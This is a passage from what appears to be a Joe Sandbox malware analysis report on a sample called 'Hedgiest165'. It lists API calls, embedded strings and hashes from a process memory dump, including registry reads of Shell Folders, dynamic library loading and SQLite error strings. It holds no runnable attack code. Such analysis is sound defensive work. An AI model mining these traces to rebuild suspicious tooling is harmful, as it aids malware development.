                                                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                        • SetFocus.USER32(?), ref: 00405B76
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$FocusItemmemset
                                                                        • String ID:
                                                                        • API String ID: 4281309102-0
                                                                        • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                        • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                        • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                        • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfwcscat
                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                        • API String ID: 384018552-4153097237
                                                                        • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                        • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                        • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                        • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                        • String ID: 0$6
                                                                        • API String ID: 2029023288-3849865405
                                                                        • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                        • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                        APIs
                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                        • memset.MSVCRT ref: 00405455
                                                                        • memset.MSVCRT ref: 0040546C
                                                                        • memset.MSVCRT ref: 00405483
                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$memcpy$ErrorLast
                                                                        • String ID: 6$\
                                                                        • API String ID: 404372293-1284684873
                                                                        • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                        • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                        APIs
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                        • String ID:
                                                                        • API String ID: 1331804452-0
                                                                        • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                        • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                        APIs
                                                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                        • String ID: advapi32.dll
                                                                        • API String ID: 2012295524-4050573280
                                                                        • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                        • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                        • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                        • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                        APIs
                                                                        Strings
                                                                        • <%s>, xrefs: 004100A6
                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf
                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                        • API String ID: 3473751417-2880344631
                                                                        • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                        • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscat$_snwprintfmemset
                                                                        • String ID: %2.2X
                                                                        • API String ID: 2521778956-791839006
                                                                        • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                        • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfwcscpy
                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                        • API String ID: 999028693-502967061
                                                                        • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                        • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                        APIs
                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                          • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                          • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                        • memset.MSVCRT ref: 0040C439
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                        • _wcsupr.MSVCRT ref: 0040C481
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                        • memset.MSVCRT ref: 0040C4D0
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                        • String ID:
                                                                        • API String ID: 4131475296-0
                                                                        • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                        • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004116FF
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                        • API String ID: 2618321458-3614832568
                                                                        • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                        • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFilefreememset
                                                                        • String ID:
                                                                        • API String ID: 2507021081-0
                                                                        • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                        • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                        APIs
                                                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                        • malloc.MSVCRT ref: 00417524
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                        • free.MSVCRT ref: 00417544
                                                                        • free.MSVCRT ref: 00417562
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                        • String ID:
                                                                        • API String ID: 4131324427-0
                                                                        • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                        • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                        • free.MSVCRT ref: 0041822B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: PathTemp$free
                                                                        • String ID: %s\etilqs_$etilqs_
                                                                        • API String ID: 924794160-1420421710
                                                                        • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                        • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                        APIs
                                                                        • wcscpy.MSVCRT ref: 0041477F
                                                                        • wcscpy.MSVCRT ref: 0041479A
                                                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$CloseCreateFileHandle
                                                                        • String ID: General
                                                                        • API String ID: 999786162-26480598
                                                                        • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                        • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                        • _snwprintf.MSVCRT ref: 0040977D
                                                                        • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                        • String ID: Error$Error %d: %s
                                                                        • API String ID: 313946961-1552265934
                                                                        • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                        • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                        • API String ID: 0-1953309616
                                                                        • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                        • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                        • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                        • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                        APIs
                                                                        Strings
                                                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                        • API String ID: 3510742995-272990098
                                                                        • Opcode ID: 3329e545d5ec6aba1881b0fa4301c309bd0113fbb75ee4600ef066edaf7bf9ee
                                                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
